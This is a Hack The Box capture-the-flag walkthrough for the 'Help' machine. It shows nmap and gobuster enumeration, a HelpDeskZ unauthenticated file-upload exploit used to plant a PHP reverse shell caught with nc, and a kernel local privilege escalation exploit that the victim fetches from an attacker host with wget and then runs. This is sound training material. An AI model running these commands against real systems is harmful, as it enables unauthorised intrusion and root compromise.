HTB Help — Walkthrough

Enumeration

So let’s start enumeration with nmap scan

root@ArmourInfosec:/ nmap -sV 10.10.10.121
Nmap scan report for 10.10.10.121 (10.10.10.121)
Host is up (0.22s latency).
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
3000/tcp open  http    Node.js Express framework
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Let’s visit on port number 80 and see what’s going on there

just Apache default index file nothing else

lets try gobuster with a small wordlist

root@ArmourInfosec:/ gobuster -u http://10.10.10.121 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.121/
[+] Threads      : 40
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout      : 10s
=====================================================
2019/05/01 08:45:18 Starting gobuster
=====================================================
/support (Status: 301)
/javascript (Status: 301)
=====================================================
2019/05/01 08:45:50 Finished
=====================================================

When we visit http://10.10.10.121/support, there is the “HelpDeskZ :: Support Ticket System”

Ok so search if there is any exploit for it

root@ArmourInfosec:/ searchsploit helpdeskz

Arbitary file upload looks interesting because it’s unauthenticated

Exploitation

Let’s try to exploit it

According to the exploit when we upload a ticket with php or some of the other extension files it shows “File is not allowed” but the file is uploaded and save to a special location under “http://10.10.10.121/support/uploads/tickets” with a encrypted name and the link we can get by the exploit so lets try I’m going to upload php reverse shell as “1.php” (remember to change the IP and Port in shell file if you are also using reverse shell), visit

http://10.10.10.121/support/?v=submit_ticket&action=confirmation

file all fields and then select the shell file and click upload it shows “File is not allowed”

then we run the exploit

root@ArmourInfosec:/ python 40300.py http://10.10.10.121/support/uploads/tickets/ 1.php

root@ArmourInfosec:/ nc -lvp 4444

$ cd /home/help
$ cat user.txt

Privilege Escalation

We got the user, for root first let’s have tty shell for that i follow the guif.re linux eop so a simple command

$ python -c ‘import pty;pty.spawn(“/bin/bash”)’

We got the tty shell

Now let’s gather some information about the machine like kernel version etc.

So for that

help@help:/$ uname -a

So it’s kernel version is 4.4.0–116, let’s find some exploits for this

root@ArmourInfosec:/ searchsploit linux 4.4.0–116

Here is a Local Privilege Escalation exploit

Let’s upload it on the victim machine I will do it with web server service

In Attacker machine

root@ArmourInfosec:/ python -m SimpleHTTPServer 80

In Victim machine

help@help:/$ cd /tmp
help@help:/$ wget http://<Attacker_IP>/44298.c

help@help:/$ gcc 44298.c
help@help:/$ ./a.out

As soon as you run it you will get root user

help@help:/$ cd /root
help@help:/$ cat root.txt

And you got the root!!!!!!!!

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

What the helpdeskz exploit doing ?

the system is saving invalid file to the tickets directory with a special name as it is taking current time and converting it to string then adding it with filename and generating its md5hash and then saving file with this name so the script is just reversing it and giving us the exaxt link where the response is “200 FOUND”.